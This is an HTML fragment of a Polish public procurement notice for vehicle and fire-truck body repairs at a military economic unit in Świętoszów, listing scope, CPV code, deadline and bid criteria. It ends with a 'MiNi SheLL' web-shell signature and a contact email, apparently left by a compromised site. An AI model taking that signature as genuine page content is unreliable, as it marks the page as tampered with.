<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywne wykonywanie, w terminie do dnia 31 października 2016 r., usługi napraw bieżących pojazdów w ilościach i czasie wynikających z bieżących potrzeb oraz według wskazań pokładowych systemów kontroli sprawności  pojazdów będących na ewidencji w 43 Wojskowym Oddziale Gospodarczym w Świętoszowie. 
Wykonawca dokona napraw w swojej siedzibie gdzie pojazd zostanie dostarczony siłami własnymi wykonawcy, na jego koszt i ryzyko, zestawem do przewozu pojazdów z zachowaniem przepisów ustawy o ruchu drogowym (obciążenia, pozwolenia na przejazd, pilotaż itd.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.21.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Narzut ceny w % zakupionych części lub ceny rozliczeniowej części w magazynie Wykonawcy - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Naprawy części specjalnej samochodów ratowniczo-gaśniczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywne wykonywanie, w terminie do dnia 31 października 2016 r., usługi napraw bieżących nadwozi specjalnych samochodów ratowniczo-gaśniczych, a także ich wyposażenia zabudowanego na stałe, będących na ewidencji w 43 Wojskowym Oddziale Gospodarczym w Świętoszowie. 
Wykonawca dokona napraw w swojej siedzibie (warunkiem jest oddalenie siedziby wykonawcy nie dalej niż 100 km od siedziby zamawiającego) gdzie zostanie dostarczony pojazd do naprawy przez zamawiającego. W przypadku większego niż 100 km oddalenia zakładu wykonawcy od siedziby zamawiają-cego  za transport pojazdu odpowiada wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.11.21.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin realizacji napraw - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com